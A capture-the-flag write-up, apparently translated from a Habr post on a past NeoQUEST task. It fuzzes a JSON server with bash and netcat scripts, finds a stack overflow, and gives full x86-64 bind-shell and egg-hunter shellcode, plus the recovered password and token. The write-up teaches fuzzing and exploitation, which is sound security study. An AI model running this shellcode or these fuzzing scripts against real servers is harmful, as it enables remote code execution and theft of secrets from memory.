Finding a vulnerability with fuzzing and developing shellcode to exploit it

Any method is fair game when hunting for vulnerabilities, but what makes fuzzing so good? The answer is simple: it lets you check how a program behaves when it receives input that is known to be invalid (and often simply random), a case that developer tests frequently do not cover.

An abnormal termination of the program during fuzzing suggests that a vulnerability may be present.

In this article we:
demonstrate how to fuzz a JSON request handler;
use fuzzing to find a buffer overflow vulnerability;
write shellcode in assembly to exploit the vulnerability we find.

We will work through a task from a past NeoQUEST, using its original conditions. We know that a 64-bit Linux server handles JSON requests that end with a null terminator (a character with code 0). To get the key, you must send a request with the correct password, but neither the source code nor the binary of the server process is available: only the IP address and port are given. The task legend also says that the MD5 hash of the correct password sits somewhere in process memory right after the 5 characters “hash:”. Pulling this value out of process memory requires remote code execution.

Probing the port

We try connecting to the given address and port. For this we use the well-known netcat utility, the “Swiss Army knife” of networking. Do not forget the terminating null character at the end of the request:

From the response we can tell what input the server process expects: it really does handle bare JSON requests with no headers or other extraneous characters. Let's find out which JSON requests the server considers syntactically valid:
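The same probe can be sketched in Python. This is a minimal sketch, not the tooling used in the task: the host is a documentation-only placeholder address, and the helper names `build_request` and `send_request` are ours.

```python
import json
import socket

# Assumption: placeholder address and port, not the real task server.
HOST = "192.0.2.10"
PORT = 8887


def build_request(obj):
    """Serialize obj as JSON and append the terminating null byte."""
    return json.dumps(obj).encode("ascii") + b"\x00"


def send_request(payload, host=HOST, port=PORT, timeout=5.0):
    """Send raw bytes and return everything the server writes back."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass  # treat prolonged silence as the end of the response
    return b"".join(chunks)
```

Calling `send_request(build_request({"pass": "guess"}))` would then play the role of one netcat invocation.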

Judging by these server responses, it recognizes integers as values, but does not recognize boolean values.

These server responses indicate that it recognizes non-empty arrays as values.

The server accepts associative arrays and ordinary arrays nested inside each other, but, again, only non-empty ones.

If the request format is correctly recognized, the server checks for the presence of the “pass” tag in the main associative array:

If there is such a tag, the server takes its value and, apparently, compares its hash with the value stored in memory.

How do we get the correct password? We could simply brute-force the password field in the requests. However, such a primitive attack produced no results.

So let's look for a vulnerability in the request handler whose exploitation will let us execute the shellcode we need and obtain the password hash.

Use fuzzing!

The only source of information is the server's responses to our requests. With neither the binary nor the source code available, we turn to fuzzing. Reading up on this approach to testing, we learn that there are two main fuzzing methods:

Data generation
Data mutation

Generation can produce random data (this approach is often called dumb fuzzing) or input built according to a model of the format (smart fuzzing). Mutation modifies existing input data.

We will use data generation and go through all the potential weak spots of the JSON format to find requests for which the server's response differs from the usual one.
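To make the distinction concrete, here is a small Python sketch of the three ideas. The function names and the tiny JSON model are our own illustration, not part of any particular fuzzer.

```python
import random
import string


def generate_dumb(rng, length):
    """Dumb generation: random printable characters with no notion of JSON."""
    return "".join(rng.choice(string.printable) for _ in range(length))


def generate_smart(rng, depth=2):
    """Smart generation: random data that follows a simple JSON model."""
    if depth == 0:
        return str(rng.randint(0, 999))
    count = rng.randint(1, 3)  # never empty: the server rejects empty arrays
    if rng.random() < 0.5:
        items = [generate_smart(rng, depth - 1) for _ in range(count)]
        return "[" + ", ".join(items) + "]"
    pairs = ['"k%d" : %s' % (i, generate_smart(rng, depth - 1))
             for i in range(count)]
    return "{" + ", ".join(pairs) + "}"


def mutate(rng, sample):
    """Mutation: take an existing input and corrupt one character."""
    pos = rng.randrange(len(sample))
    return sample[:pos] + rng.choice(string.printable) + sample[pos + 1:]
```

Passing an explicit `random.Random(seed)` as `rng` keeps a fuzzing run reproducible, which helps when an interesting input has to be replayed.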

We will conduct the check in several stages:

Replace the service characters of a valid request with incorrect ones.
Nest JSON objects and lists inside each other to a great depth.
Form requests in which there is “a lot” of something (long strings in keys and values, objects with many key-value pairs, long lists).

1. Replacing service characters of a valid request with incorrect ones

The service characters are brackets, braces, commas, colons and delimiters (spaces). Replacing them breaks the structure of a valid request in different places. An example of such a fuzzer:

    #!/bin/bash
    # valid base request
    base='{"example" : {"innerobj" : "someval"}, "example" : 777777777, "example" : [1, [2, {"inlist" : "val"}], 3], "end" : "543"}'
    ad1='Access Denied, pass tag not found in JSON..'
    ad2='Exit code = 0'
    if1='Incorrect data format! Check your JSON syntax.'
    if2='Exit code = 1'
    # characters to replace in the valid base request
    declare -a checkable_syms=('[' ']' '{' '}' ' ' ':' ',')
    # "bad" substitutions to replace them with
    declare -a arr=(" " "]" "{" "[[" "}}" ":" "," "A" "1" ";")
    echo "Fuzzing maintenance symbols.."
    for symbol in "${checkable_syms[@]}"
    do
        # how many occurrences of the symbol are in the base string?
        num=$(($(echo "$base" | awk "BEGIN{FS=\"[$symbol]\"} {print NF}") - 1))
        # check every position of the symbol
        for i in $(seq 1 $num)
        do
            # try all of the "bad" substitutions
            for bad_sym in "${arr[@]}"
            do
                # skip replacing a symbol with itself
                if [[ "$bad_sym" != "$symbol" ]]; then
                    # construct the request and send it to the server
                    resp=`echo -e "$base\x00" | sed "s/[$symbol]/$bad_sym/$i" | nc 213.170.91.86 8887`
                    # check the answer: if it is not a standard one, something happened
                    [[ (("$resp" =~ "$if1" && "$resp" =~ "$if2")) || (("$resp" =~ "$ad1" && "$resp" =~ "$ad2")) ]] || echo "$resp"
                fi
            done
        done
    done

This test yielded nothing, so we move on to other cases.
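The core of this fuzzer, reduced to two pure functions, might look as follows in Python. The response strings are taken from the script; the names `is_expected` and `substitutions` are ours and purely illustrative.

```python
# Substrings of the two "normal" answers, as used in the bash fuzzer.
ACCESS_DENIED = ("Access Denied, pass tag not found in JSON..", "Exit code = 0")
BAD_FORMAT = ("Incorrect data format! Check your JSON syntax.", "Exit code = 1")


def is_expected(response):
    """True if the response contains both parts of a known normal answer."""
    for message, exit_line in (ACCESS_DENIED, BAD_FORMAT):
        if message in response and exit_line in response:
            return True
    return False


def substitutions(base, targets, replacements):
    """Yield every request obtained by replacing one target character."""
    for pos, ch in enumerate(base):
        if ch not in targets:
            continue
        for bad in replacements:
            if bad != ch:  # replacing a character with itself changes nothing
                yield base[:pos] + bad + base[pos + 1:]
```

Any response for which `is_expected` returns `False` is worth a closer look, which is exactly the condition under which the bash script prints the response.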

2. Checking deep nesting of JSON objects and lists inside each other

An example fuzzer for this check:

    #!/bin/bash
    # how many nested objects
    N=1024
    base='"{\"example\" : "'
    final='"{\"innerobj\" : \"someval\"}"'
    ad1='Access Denied, pass tag not found in JSON..'
    ad2='Exit code = 0'
    if1='Incorrect data format! Check your JSON syntax.'
    if2='Exit code = 1'
    echo "Fuzzing nested objects.."
    for i in $(seq 1 $N)
    do
        # construct the request with i levels of nested objects
        que="$base*$i + $final + \"}\"*$i + \"\x00\""
        pyt="print($que);"
        resp=`python -c "$pyt" | nc 213.170.91.86 8887`
        # check the answer: if it is not a standard one, something happened
        [[ (("$resp" =~ "$ad1" && "$resp" =~ "$ad2")) ]] || echo "$resp"
    done

Again the server processes all requests correctly. Deeply nested lists are checked in the same way, and the server handles them correctly too. We keep checking!
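The nested requests, including the list variant for which no script is shown, can be generated along these lines. This is a sketch with our own helper names; wrapping the list in an object is an assumption based on the server looking for the “pass” tag in a top-level associative array.

```python
def nested_objects(depth):
    """{"example" : {"example" : ... {"innerobj" : "someval"} ... }}"""
    return '{"example" : ' * depth + '{"innerobj" : "someval"}' + "}" * depth


def nested_lists(depth):
    """[[[ ... [1] ... ]]] with a non-empty list at every level."""
    return "[" * depth + "1" + "]" * depth


def nested_list_request(depth):
    """Wrap the nested list in a top-level object (assumed to be required)."""
    return '{"example" : ' + nested_lists(depth) + "}"
```

Each string still needs the terminating null byte appended before it is sent.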

3. Checking requests in which there is “a lot” of something

We check long strings in keys and values, objects with many key-value pairs, and long lists.

    #!/bin/bash
    # maximum number of padding characters in the long string
    N=2048
    base1='{\"example'
    letter='A'
    final1='\": \"example\"}'
    base2='{\"example\" : \"example'
    final2='\"}'
    ad1='Access Denied, pass tag not found in JSON..'
    ad2='Exit code = 0'
    if1='Incorrect data format! Check your JSON syntax.'
    if2='Exit code = 1'
    flag=0
    echo "Fuzzing long strings.."
    for i in $(seq 1 $N)
    do
        # alternate between a long key and a long value
        if [[ "$flag" == 0 ]]; then
            base=$base1
            final=$final1
            flag=1
        else
            base=$base2
            final=$final2
            flag=0
        fi
        que="\"$base\" + (\"$letter\")*$i + \"$final\" + \"\x00\""
        pyt="print($que);"
        resp=`python -c "$pyt" | nc 213.170.91.86 8887`
        # check the answer: if it is not a standard one, something happened
        [[ (("$resp" =~ "$ad1" && "$resp" =~ "$ad2")) ]] || echo "$resp"
    done
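The script covers long keys and long values; the long-list case is not shown. A minimal Python sketch of all three generators could look like this, where the helper names and the list contents are our own choice:

```python
def long_key(n):
    """A key padded with n extra characters."""
    return '{"example' + "A" * n + '": "example"}'


def long_value(n):
    """A value padded with n extra characters."""
    return '{"example" : "example' + "A" * n + '"}'


def long_list(n):
    """An object whose only value is a list of n integers (n >= 1)."""
    return '{"example" : [' + ", ".join(str(i) for i in range(n)) + "]}"
```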

As you can see, long strings are handled normally. Long lists too. What about long objects?

An example fuzzer:

    #!/bin/bash
    # how many pairs in the resulting object
    N=260
    head='{'
    block='\"example\" : \"val\", '
    final='\"last\" : \"block\"}'
    ad1='Access Denied, pass tag not found in JSON..'
    ad2='Exit code = 0'
    if1='Incorrect data format! Check your JSON syntax.'
    if2='Exit code = 1'
    echo "Fuzzing long objects.."
    for i in $(seq 1 $N)
    do
        # construct a long object
        que="\"$head\" + (\"$block\")*$i + \"$final\" + \"\x00\""
        pyt="print($que);"
        resp=`python -c "$pyt" | nc 213.170.91.86 8887`
        # check the answer: if it is not a standard one, something happened
        [[ (("$resp" =~ "$if1" && "$resp" =~ "$if2")) || (("$resp" =~ "$ad1" && "$resp" =~ "$ad2")) ]] || echo "$resp"
    done

Here it is! If the object is long enough, the server's response is incomplete: no exit code is sent to the user. This starts to happen when the object contains more than 257 key-value pairs. If we increase their number further, no answer comes at all:

Apparently, we have a classic buffer overflow. While parsing the request, the server places key-value pairs into a fixed-size buffer on the stack without first checking how many pairs the request contains.

Presumably, when the number of pairs is between 257 and 281, the return address of the request handler function gets overwritten, and when there are more than 281, some local variables located beyond the return address are probably overwritten as well. In the latter case not even the first part of the error message reaches the user.
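Boundaries like these can be located mechanically by classifying each response and grouping consecutive pair counts that behave the same way. The sketch below is our own illustration: `ask` stands for any caller-supplied function that sends a request and returns the response text, and the three class labels are hypothetical names for the behaviours described above.

```python
from itertools import groupby


def long_object(pairs):
    """Build an object with the given total number of key-value pairs."""
    body = ", ".join('"k%d" : "v"' % i for i in range(pairs))
    return "{" + body + "}"


def classify(response):
    """Coarse response classes that tell the overflow stages apart."""
    if not response:
        return "no answer"
    if "Exit code" not in response:
        return "no exit code"
    return "normal"


def find_ranges(counts, ask):
    """Group consecutive pair counts that produce the same response class."""
    labelled = [(n, classify(ask(long_object(n)))) for n in counts]
    ranges = []
    for label, group in groupby(labelled, key=lambda item: item[1]):
        numbers = [n for n, _ in group]
        ranges.append((numbers[0], numbers[-1], label))
    return ranges
```

Run over, say, `range(250, 300)` against the real server, the result would be a short list of `(first, last, label)` tuples from which the thresholds can be read off directly.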

Vulnerability found!

Exploiting the vulnerability

To complete the task and get the coveted token, we need to understand how the return address gets overwritten. It is logical to assume that it is not the strings themselves (the keys and values of the object in the request) but pointers to them that are placed on the stack one after another. If so, we need not worry about where the shellcode lands in memory or how to transfer control to it. ASLR also stops being an obstacle in this case.

DEP could seriously spoil things for us, because the memory for the strings is allocated on the heap. But let's not jump to conclusions and instead test our idea in practice. We take some test shellcode for our platform to find out whether heap memory is executable in the server process.

For this we take an ordinary, publicly available bind shell on port 4444:

Since we know nothing about the exact size of the buffer, the presence of other local variables, stack alignment and so on, we need to place the shellcode with some margin. We put it in the values of four pairs that follow 256 ordinary pairs:
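The layout of such a request can be sketched as follows. The byte string used here is only a placeholder of NOP bytes, not working shellcode; the key names and the list of forbidden bytes are our assumptions about what a JSON string value can safely carry.

```python
FILLER_PAIRS = 256     # ordinary pairs that precede the shellcode
SHELLCODE_PAIRS = 4    # pairs whose values carry the shellcode

# Placeholder only: NOP bytes standing in for real shellcode.
PLACEHOLDER = b"\x90" * 16

# Assumption: bytes that would terminate the request or break the JSON string.
FORBIDDEN = (b"\x00", b'"', b"\\")


def check_bytes(code):
    """Reject byte values that cannot be embedded in a JSON string value."""
    for bad in FORBIDDEN:
        if bad in code:
            raise ValueError("byte %r cannot be embedded" % bad)
    return code


def build_payload(code):
    """256 filler pairs, then four pairs carrying `code`, then the null byte."""
    code = check_bytes(code)
    filler = b'"example" : "val", ' * FILLER_PAIRS
    carrier = b", ".join(b'"sc" : "' + code + b'"'
                         for _ in range(SHELLCODE_PAIRS))
    return b"{" + filler + carrier + b"}\x00"
```

The check in `check_bytes` reflects a general constraint on this kind of payload: the shellcode travels inside a null-terminated text request, so it must not contain the bytes that end it early.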

Hooray, everything works! The memory holding the shellcode is executable, and the return address of the request handler function is automatically overwritten with a pointer to the string containing the shellcode. We have a remote shell on the server. Let's try to build on this success and get at the binary of the JSON handler:

Alas, we do not have enough rights to do anything worthwhile. It seems that the server handler binary is encrypted, and without the password the binary code cannot be accessed.

Writing the shellcode and getting the token

It is too early to despair. Recall that our goal here is not the binary as such but a value in the memory of the /neoquest/vuln process.

Knowing that the binary file is encrypted and that the bind shell replaces the current server process in memory with a bash process, we take a different route. We will write our own egg-hunter shellcode, which finds the desired value in the process's memory by its known prefix (“hash:”) and returns it to the user.

Our version of the shellcode (it is long!):


    xor eax,eax
    xor ebx,ebx
    xor edx,edx
    ;socket create syscall
    mov al,0x1
    mov esi,eax
    inc al
    mov edi,eax
    mov dl,0x6
    mov al,0x29
    syscall
    ;store the server sock
    xchg ebx,eax
    ;bind on port 4444 syscall
    xor rax,rax
    push rax
    push 0x5c110102
    mov [rsp+1],al
    mov rsi,rsp
    mov dl,0x10
    mov edi,ebx
    mov al,0x31
    syscall
    ;listen syscall
    mov al,0x5
    mov esi,eax
    mov edi,ebx
    mov al,0x32
    syscall
    ;accept connection syscall
    xor edx,edx
    xor esi,esi
    mov edi,ebx
    mov al,0x2b
    syscall
    ;store socket
    mov edi,eax
    ;dup2 syscalls - for printing result to client
    xor rax,rax
    mov esi,eax
    mov al,0x21
    syscall
    inc al
    mov esi,eax
    mov al,0x21
    syscall
    inc al
    mov esi,eax
    mov al,0x21
    syscall
    ;egg hunter
    xor rsi, rsi ; Some prep junk.
    xor rdi, rdi
    xor rbx, rbx
    add bl, 5
    go_end_of_page:
    or di, 0x0fff ; We align with a page size of 0x1000
    next_byte:
    mov cx, di
    cmp cl, 0xff ; next byte offset
    jne cmps
    inc rdi
    push 21
    pop rax ; We load access() in RAX
    ; push rdx
    ; pop rdi
    mov rdx, rdi
    add rdi, rbx ; We need to be sure our 5 byte egg check does not span across 2 pages
    syscall ; syscall to access()
    cmp al, 0xf2 ; Checks for EFAULT. EFAULT indicates bad page access.
    je go_end_of_page
    jmp cmps2
    cmps:
    inc rdi
    cmps2:
    cmp [rdi - 4] , dword 0x3a687361 ;ash: letters
    jne next_byte
    cmp [rdi - 5] , dword 0x68736168 ;hash letters
    jne next_byte
    after:
    ;write 32 bytes of the MD5 hash to the client
    xor rax, rax
    add rax, 1
    mov rsi, rdi
    xor rdi, rdi
    add rdi, 1
    xor rdx, rdx
    mov dl, 0x20 ; Size of the output
    syscall
    ;exit syscall
    ;(0x3b is syscall 59, execve, on x86-64 Linux; exit is 60, i.e. 0x3c)
    xor rax, rax
    add rax, 0x3b
    xor rdi, rdi
    syscall
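One detail of the bind step is worth unpacking: the constant `0x5c110102` followed by `mov [rsp+1],al`. Our reading is that the immediate is chosen to contain no zero bytes and that the unwanted byte is cleared afterwards on the stack. The following Python lines reproduce the resulting memory layout; the variable names are ours.

```python
import socket
import struct

# The pushed immediate as it lies in little-endian memory: 02 01 11 5c
raw = bytearray(struct.pack("<I", 0x5C110102))

# Effect of `mov [rsp+1], al` with al == 0: clear the second byte.
raw[1] = 0

# sockaddr_in starts with sin_family (host byte order), then sin_port
# (network byte order, i.e. big-endian).
family = struct.unpack_from("<H", raw, 0)[0]
port = struct.unpack_from(">H", raw, 2)[0]

print(family == socket.AF_INET, port)
```

After the patch the first four bytes describe an `AF_INET` socket address with port 4444, which matches the comment in the listing.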

What this shellcode does:

Creates a socket, binds it to the desired port (bind, 4444) and waits for a connection (listen).
Accepts a connection and saves the client socket for later use (accept).
Duplicates the client socket onto the STDIN, STDOUT and STDERR descriptors so that the result goes to the client (dup2).
Walks through memory page by page (4 KB). If an address is mapped into the address space of the process, it moves along the page looking for the 5-character prefix "hash:". If the address is not mapped, it moves on to the next page. Addresses are checked with the access system call.
Uses the address it found to send the 32 bytes of memory that follow it to the client socket (the write system call); this should be the password hash we need.
Exits.
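The search step in this list can be modelled in a few lines of Python. This is a simplified simulation, not a translation of the assembly: the address space is a dictionary of pages, and a missing page plays the role of the EFAULT result returned by access. All names are ours.

```python
PAGE = 0x1000
EGG = b"hash:"
HASH_LEN = 32


def read(pages, addr, size):
    """Read up to `size` bytes, stopping at the first unmapped page."""
    out = bytearray()
    for a in range(addr, addr + size):
        page = pages.get(a & ~(PAGE - 1))
        if page is None:
            break
        out.append(page[a % PAGE])
    return bytes(out)


def egg_hunt(pages, limit):
    """Scan a toy address space for EGG and return the bytes that follow it.

    `pages` maps a page-aligned address to that page's 4096 bytes.
    """
    addr = 0
    while addr < limit:
        page = addr & ~(PAGE - 1)
        if page not in pages:
            addr = page + PAGE   # unmapped: skip the whole page at once
            continue
        if read(pages, addr, len(EGG)) == EGG:
            return read(pages, addr + len(EGG), HASH_LEN)
        addr += 1
    return None
```

Skipping a whole page on a failed check is what keeps the real search feasible: most of a 64-bit address space is unmapped, so probing it byte by byte would never finish.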

The shellcode is written; now let's test our solution:

It worked! When we connect to port 4444, we see the 32 characters of the password hash we need. All that remains is to recover the password. We use Google:

The password we need: ABAB865A15B15538D81C066574449597. All that remains is to get the coveted token:

The token we were after: 795944475660c18d83551b51a568baba

Advantages and disadvantages of fuzzing

The wide variety of possible entry points (a text string entered through a GUI, binary data from a file, the value of a network request field) and of applications under test (you can fuzz files, protocols, drivers, web applications, source code ...) makes fuzzing a rather effective approach to finding security problems in code.

In this article we demonstrated a fairly simple example of fuzzing in which mutation of the generated test data was kept to a minimum, but modern fuzzers (Peach, Sulley, HotFuzz, and others) offer much richer functionality and implement many mutation algorithms.

However, testing by fuzzing has a fairly obvious disadvantage: since the fuzzer knows nothing about the internal structure of the program under test, it has to go through a huge number of test inputs to find security problems. That, in turn, takes considerable time.

Even more interesting tasks at NeoQUEST-2017!

Working through NeoQUEST tasks, you can always learn something new and see how particular security mechanisms work in practice. In this article we talked about fuzzing, showed how to detect a buffer overflow vulnerability with it, and wrote shellcode in assembly for the vulnerability we found. We executed our code without even having the binary of the vulnerable program. This clearly demonstrates what can happen when a server is poorly implemented.

The NeoQUEST-2017 tasks, which run from March 1 to 10, will undoubtedly also have something to teach, so feel free to register!

Source: https://habr.com/ru/post/321912/
